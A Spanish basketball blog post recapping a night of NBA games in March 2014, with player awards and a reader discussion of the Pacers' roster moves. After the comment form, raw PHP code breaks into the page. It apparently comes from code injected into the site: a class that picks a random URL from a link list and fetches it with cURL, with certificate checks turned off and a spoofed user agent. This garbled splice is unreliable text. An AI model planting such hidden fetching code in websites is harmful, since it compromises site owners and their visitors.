La Crónica: Empieza el último mes de liga regular

18 de March de 2014 por Simon

Entramos en el último mes de liga regular con los 7 partidos que se disputaron ayer.  Cualquier encuentro vale doble a estas alturas de temporada y un paso en balde puede dejarte fuera de los puestos de honor. Eso debieron pensar los Thunder que, tras perder la noche anterior en su casa ante los Mavs, no podían permitirse caer de nuevo aunque se enfrentaran a los rocosos Bulls en su feudo. Así pues, los jugadores de Oklahoma City salieron a la cancha mentalizados de que un tropiezo les dejaba fuera de la pelea por el número 1 de la conferencia pero a pesar del excelente partido de Durant y Westbrook, Chicago aguantó hasta que a falta de 10 minutos la intimidación de Ibaka y un parcial de 13-0 consiguieron sacarles de rueda (97-85). La jornada fue redonda para los Thunder que horas después veían como su máximo perseguidor, los Clippers, perdían en la cancha de Denver Nuggets. Los de Brian Shaw se mostraron inspiradísimos toda la noche y lo demostraron con un gran acierto en los minutos finales de partido en los que los Clippers fueron incapaz de frenarlos (100-110).

Uno de los partidos a priori más interesantes de la jornada era el que enfrentaba a Phoenix Suns contra los Brooklyn Nets, un choque de estilos opuestos. Sin embargo, los Nets empezaron como un tiro y abrieron brecha para vivir cómodos durante el resto del encuentro (95-108). Deron Williams cuajó el que probablemente sea su mejor partido de la temporada y parece que se va poniendo en forma ahora que se acercan los Play Off. Por su parte los Suns siguen acumulando más derrotas de las deseadas y su objetivo de los Play Off, con los que han estado soñando todo el año, se desvanece cada vez más.  

Los que parecen asegurar su plaza en Play Off son los Atlanta Hawks. Lla vuelta de Paul Millsap les ha espoleado y con la de ayer ya son 4 las victorias consecutivas que acumulan. Anoche vencieron a domicilio a uno de los equipos más en forma de la liga, los Charlotte Bobcats. Un gran Kemba Walker parecía encarrilar la victoria para los Bobcats en la primera mitad pero en la segunda los Hawks fueron el único equipo sobre la cancha y les barrieron  para anotarse una victoria un tanto inesperada (97-83).

En el resto de partidos de la jornada, duelos desiguales que  se saldaron con victorias para el mejor clasificado. Los Pacers vencieron en casa a los Sixers (90-99) pero a pesar de la fragilidad del rival y la victoria, Indiana evidenció que no llegan al final de campaña en su mejor forma. Más sencillo lo tuvieron los Rockets que avasallaron a los Jazz en un duelo muy dispar a pesar de la baja de Howard (86-124). Para terminar, los Mavs no se dejaron sorprender y vencieron con bastante sufrimiento a unos Celtics en los que descansó Rondo (89-94).

PREMIOS

MVP: Apareció el mejor Kevin Durant para imponerse a uno de los equipos más duros de la liga, los Chicago Bulls. Sus 35 puntos, 12 rebotes y 5 asistencias doblegaron la resistancia de los de Tom Thibodeau.

Rookie: Kelly Olynyk fue el mejor de los Celtics con 16 puntos y 9 rebotes. De Hollis Thompson mejor hablamos en el siguiente apartado.

Sorpresa: En los actuales sixers de las 21 derrotas consecutivas puede destacar un jugador totalmente desconocido como Hollis Thompson, titular ante la baja de James Anderson y que anotó 17 puntos con un 6 de 7 en TC. No es lo mismo ser el mejor jugador, por ejemplo, de los Rockets como lo fue ayer Terrence Jones que recuperó su mejor nivel ante los Jazz. Anotó 30 puntos, capturó 5 rebotes y puso 4 tapones.

Decepción: Wilson Chandler es candidato al premio “Decepción de la temporada” por partidos como el de ayer. 11 puntos (con un 5 de 15 en TC), 3 pérdidas, 2 rebotes y 1 asistencia. Muy pobre.

Esfuerzo en vano: En esta ocasión la buena actuación de Chris Paul no fue suficiente para lograr la que hubiera significado la docena victoria consecutiva de los Clippers. Sus 29 puntos, 7 asistencias y 3 robos no sirvieron ante los Nuggets.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. txusma dice:
    #1

    Andray Blatche tiene una clase que no se la acaba. Vaya jugadita que le marca a Alex Len…

      Citar

  2. Esteban dice:
    #2

    es preocupante lo mal que llegan los Pacers al final de la regular, sus ultimos 20 juegos han sido pesimos, no solo por que han peridod una cantidad considerable de partidos, sino tambien, por que practicamente no le han ganado a ningun rival verdaderamente duro, y los muchos juegos que han ganado se han visto beneficiados por jugar con rivales de los mas flojos de la liga

    les quedan 15 juegos para ponerse en forma, ojala que lo logren

      Citar

  3. Sancho88 dice:
    #3

    Siempre loamos a Frank Vogel con sus Pacers, también a Larry Bird, y destrozamos al anterior jefe de operaciones del equipo, Donnie Walsh. Pues bien, ya que somos capaces siempre de destrozar a cualquiera con tal de darnos la razón a nosotros mismos, convendría rectificar en pleno con la labor de Walsh y recordar que bajo su mandato, DJ Augustin, Gerald Green y Miles Plumlee jugaban en los Pacers, Y todos decíamos que acertó Bird echando a estos tres jugadores y trayendo a CJ Watson, Chris Copeland y Luis Scola. Y encima ahora lo de Bynum, que ni fú ni fá tampoco. A lo mejor Turner sí que vale, pero también está siendo super irregular. Si te sales del quinteto de Pacers es difícil ver a un suplente anotar más de 10 puntos en un partido. Ahí algo falla, o es Vogel, los sistemas, les falta un base… ni idea, pero algo falla, y también se ve que no son capaces de enderezar a Hibbert en la temporada regular. Al final les va a pasar factura todo esto, George no es un anotador compulsivo, no te va a ganar por sí mismo un partido de las finales de conferencia. Puede que Indiana asegure ventaja de campo en las finales, pero es que tampoco eso les da superioridad aplastante contra Miami.

    Quiero decir, ahora nadie sale diciendo… nos equivocamos de pleno, puede que Larry la haya cagado un poco bastante? O, con perspectiva los movimientos que hizo empeoraron a su equipo? El último mes desde luego es desastroso, y yo no sé si van a ser capaces de alcanzar ese gran nivel del año pasado en playoffs. Puede que sí, pero hay dudas. // Ahora tocaría alabar a Thiboddeau una vez más, por reinventarase una vez más unos Bulls competitivos al máximo, con Augustin como director de orquesta (crocher de izquierdas de Thibbs a Vogel en todo su gepeto), y desde luego directo de derechas de Hornaceck a Vogel también con Green y Plumlee. A lo mejor no había hecho falta fichar a Bynum, ni fichar a Turner si hubieran hecho otro tipo de trabajo con Green y Plumlee, Indiana vence y muere en defensa, y se olvidan del ataque, y no tienen tiradores puros. No sé, ahora mismo no son candidatos al título.

    Por otra parte, tengo ganas de ver el destrozo de los Nets a los Raptors y de los Bulls a los Wizards. No van a saber ni por dónde les llegan las hostias. Wizards tengo claro que van a palmar a 7 partidos. Decía la canción… demasiado corazón, demasiado corazón… yo diría aquí… demasiado Thiboddeau, demasiado Thiboddeau…
    y Raptors los veo muy inexpertos ante unos Nets que tienen tooooda la experiencia del mundo en playoffs, con jugadores con anillos, Deron con muchísimas ganas de reivindicarse, JJ que después del all star está volviendo a resurgir, lo de Blatche que es tremendo… y luego Bobcats y Hawks que no van a tener nada que hacer contra Heat y Pacers. Los Knicks lo tienen muy jodido. Van a tener que seguir apretando a muerte si quieren el octavo puesto, y aún así lo veo muy difícil. La vuelta de Millsap los ha condenado.

    Y sobre las críticas a GM, a Bird lo alabamos y a Jordan lo quemamos en la hoguera. Pues Michael Jordan también ha conseguido crear un equipo bastante majete. Muy buena defensa exterior, peor con la defensa interior, pero ahí están rozando el 50% de victorias.

      Citar

  4. Sancho88 dice:
    #4

    Y se me olvida también. Qué pena que en el Oeste solo repartan 8 plazas, podrían dar 9 o 10 que no pasaría nada. Bobcats y Hawks van a entrar con parciales idénticos que Wolves y Nuggets, 10 y 11 de conferencia. Acojonante cuando menos.

    La gran pena de esta temporada son los Nuggets. Ahora sí parece que Brian Shaw está enderezando al equipo con Lawson sano, pero les pasó lo de Andre Miller, el out of season de Nate Robinson, de Gallinari y McGee… pero yo no tengo ninguna duda en que el año que viene van a entrar a competir en la parte noble del Oeste segurísimo. Con ese pedazo de base anotador, distribuidor que lo hace todo bien, y ese Manimal copiándose de Blake Griffin y dando un salto cualitativo en sus prestaciones ofensivas, el equipo mola muchísimo. Han revivido a Mozgov, Hickson se ha adaptado también super bien como suplente y como titular lo ha hecho siempre genial, y les ha faltado mejor juego exterior. Ni Chandler ni Fournier son lo que un equipo necesita para ir a Playoffs, y Foye puede estar bien como sexto hombre. A lo mejor Gary Harris o Rodney Hood les vendrían de perlas a los Nuggets. Y está claro que la vuelta de Gallo les va a dar un respiro en la anotación.

    Pero sí, están molando mucho ahora los Nuggets y es una pena verles fuera de competición tan pronto

      Citar

  5. Sancho88 dice:
    #5

    Otro palito a Bird: Danny Granger. Obtiene a Turner a cambio, y tampoco queda claro si Turner es mejor que Granger. Puede que todos hubiéramos hecho lo mismo, y a priori también parecía un traspaso super bueno para Pacers, pero luego ves jugar a Granger en un sistema mixto defensa-ataque como el de los Clippers, y piensas, otra cagada de Bird. Es que a lo mejor lo que tenían que hacer los Pacers es dejar de amarrarse atrás, buscar un director más alegre para darle más ritmo al equipo, minimizar las pérdidas, etc. y no joder tanto la moral de los jugadores de banquillo. Me imagino a Augustin, Green, Plumlee, Scola y Granger, y qué queréis que os diga, pero a toro pasado (que es como se deben analizar los movimientos, no nos equivoquemos, que aquí siempre analizamos antes de tiempo) el equipo es peor que habiendo optimizado lo que tenían.

    Y este comentario no es oportunista. Es que un análisis es poner en contexto hechos y consecuencias, el porqué de las cosas, y en un análisis a posteriori se le podrían dar muchos palos a Larry.

      Citar

  6. jhc dice:
    #6

    Sancho88:
    Y se me olvida también. Qué pena que en el Oeste solo repartan 8 plazas, podrían dar 9 o 10 que no pasaría nada. Bobcats y Hawks van a entrar con parciales idénticos que Wolves y Nuggets, 10 y 11 de conferencia. Acojonante cuando menos.

    Yo soy de los que opino que deberian ugar los 16 mejores registros sin mirar la conferencia;1 vs 16, 2 vs 15 y asin pero eso eliminaria los titulos de conferencia que dan algun prestigio :S

      Citar

  7. Esteban dice:
    #7

    ahora que lo dices Sancho88 es algo extraño, Pumlee, Green y Augustine, jugaron poco y nada, y lo hicieron mal en indianoa, los contratos de Augustine y Green era una lacra total

    De hecho nadie ofrecio un contrato decente a D.J., quien termino siendo cortado por los Raptors, y Los Suns exigieron la primera ronda de los Pacers mas Pumlee para comerse el contrato de green

    todo pareci logico, y como dices, excelente Bird y pesimo Walsh

    pero ahora resulta que Green es una estrella de la liga, con numeros all-star y Augustine es el reemplazante de un tal Rose…

    ambos jugaron mal en indiana e hicieron bien en irse, o Bird hizo bien en echarlos, su actualidad es algo totalmente inesperado, y que creo se debe mas a una situacion de ambiente y de sistema que favorece a ambos que a su verdadero nivel

    A Pumlee nadie lo queria echar, pero teniendo a Hibbert y Mahinmi, y sin Tyler, se debio sacrificar a Pumlee para fichar a Scola

      Citar

  8. rumbero dice:
    #8

    Sancho88:
    Es que a lo mejor lo que tenían que hacer los Pacers es dejar de amarrarse atrás, buscar un director más alegre para darle más ritmo al equipo, minimizar las pérdidas, etc. y no joder tanto la moral de los jugadores de banquillo. Me imagino a Augustin, Green, Plumlee, Scola y Granger, y qué queréis que os diga, pero a toro pasado (que es como se deben analizar los movimientos, no nos equivoquemos, que aquí siempre analizamos antes de tiempo) el equipo es peor que habiendo optimizado lo que tenían.

    Pero es que no les ha ido nada mal a los Pacers como para no seguir con la idea de que la base sea tener un bloque granítico en defensa y jugar lo justito. Vienen de una mala racha, pero no creo que se pueda dudar del modelo (aún) con ese 4-3 contra Miami la temporada pasada y el segundo mejor record de regular en esta.
    El tema de los jugadores es otra cosa sí, y no sabría decirte como se reparte la cuota de culpa. Ahí entran muchos factores: minutos, sistema de juego, rol en el equipo, confianza del entrenador… pero en un equipo como Indiana que se basa muchos minutos del quintento titular (especialmente cuando empieza lo bueno) es díficil no tocar la moral del banquillo. De ahí que igual “encajen” mejor Watson y Scola que Green y Augustin

      Citar

  9. Vader dice:
    #9

    Bueno ya tenemos a Phil Jackson en New York:

    http://espn.go.com/video/clip?id=10627373&ex_cid=espnapi_public

    Big hopes

      Citar

  10. rumbero dice:
    #10

    Vader:
    Bueno ya tenemos a Phil Jackson en New York:

    http://espn.go.com/video/clip?id=10627373&ex_cid=espnapi_public
    Big hopes

    Mucha faena por delante, pero sólo con que su llegada implique que Dolan se esté quietecito de verdad, ya son muy buenas noticias para los Knicks.

      Citar

  11. HisRoyalAirness dice:
    #11

    Vamos a ver a Granger lo traspasaron porque no iban a renovarlo por lo que pedía y sacaron algo a cambio. Mejor? No, pero algo.
    Y lo de Bynum? Sacarlo del mercado para que no lo pescase un rival directo (como los Heat, que se les hace de noche ante pivots grandes) y bueno, casi doble-doble en los dos partidos que ha jugado con 16 minutos de media eh? A mí me parece un fichajazo

      Citar

  12. Jose Luis dice:
    #12

    Lo de Gerald Green igual, en un equipo que juega corriendo y más alegre, con muchos minutos, pues se está saliendo. Ponlo en un equipo de Popovich, Doc Rivers, o el mismo Vogel, y Green no tendrá muchos minutos. Daselo a D’Antoni, y te lo hace All-Star.

    Scola, un veterano que en PO seguramente de más que Plumlee.

    Augustin, por lo que fuera, tampoco cogió confianza, quizá aquí sea más culpa del entrenador. A mi Augustin siempre me pareció un base correcto, la verdad. En los Bulls está teniendo buenas actuaciones, quizá también por confianza o minutos.

      Citar

  13. Sancho88 dice:
    #13

    Augustin tuvo una lesión si no recuerdo mal cuando empezaba a despuntar en la liga en su época en los Bobcats. Iba para líder de equipo en la era post Larry Brown junto a Gerald Henderson. El bajón que ha tenido estos últimos dos años nadie se lo puede explicar. Ahora de repente es otra vez un base rapidísimo y anotador, muy difícil de defender. Yo creo que Thibbs revive a ún muerto. Le dimos muchos palos por aquella lesión de Rose, y creo que fuimos muy injustos con él. La verdad es que me sigue pareciendo uno de los 3 mejores entrenadores de la liga junto a Pops y Doc Rivers. Yo estoy convencido que sin Thiboddeau estos Bulls estaban fuera de Playoffs seguro

      Citar

  14. Lucho dice:
    #14

    Jose Luis:
    Lo de Gerald Green igual, en un equipo que juega corriendo y más alegre, con muchos minutos, pues se está saliendo. Ponlo en un equipo de Popovich, Doc Rivers, o el mismo Vogel, y Green no tendrá muchos minutos. Daselo a D’Antoni, y te lo hace All-Star.

    Este parrafo me parece una maravilla. Excede al caso que estamos comentando de los Pacers.
    Ojala lo piense mas gente, y deje de comparar jugadores como si esto fuera individual como el tenis y no hubiera contexto de equipo o diferentes formas de jugar. Aplica para la NBA y, aunque aca no venga al caso, al futbol y tambien al deporte en general. Ejemplos sobran

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>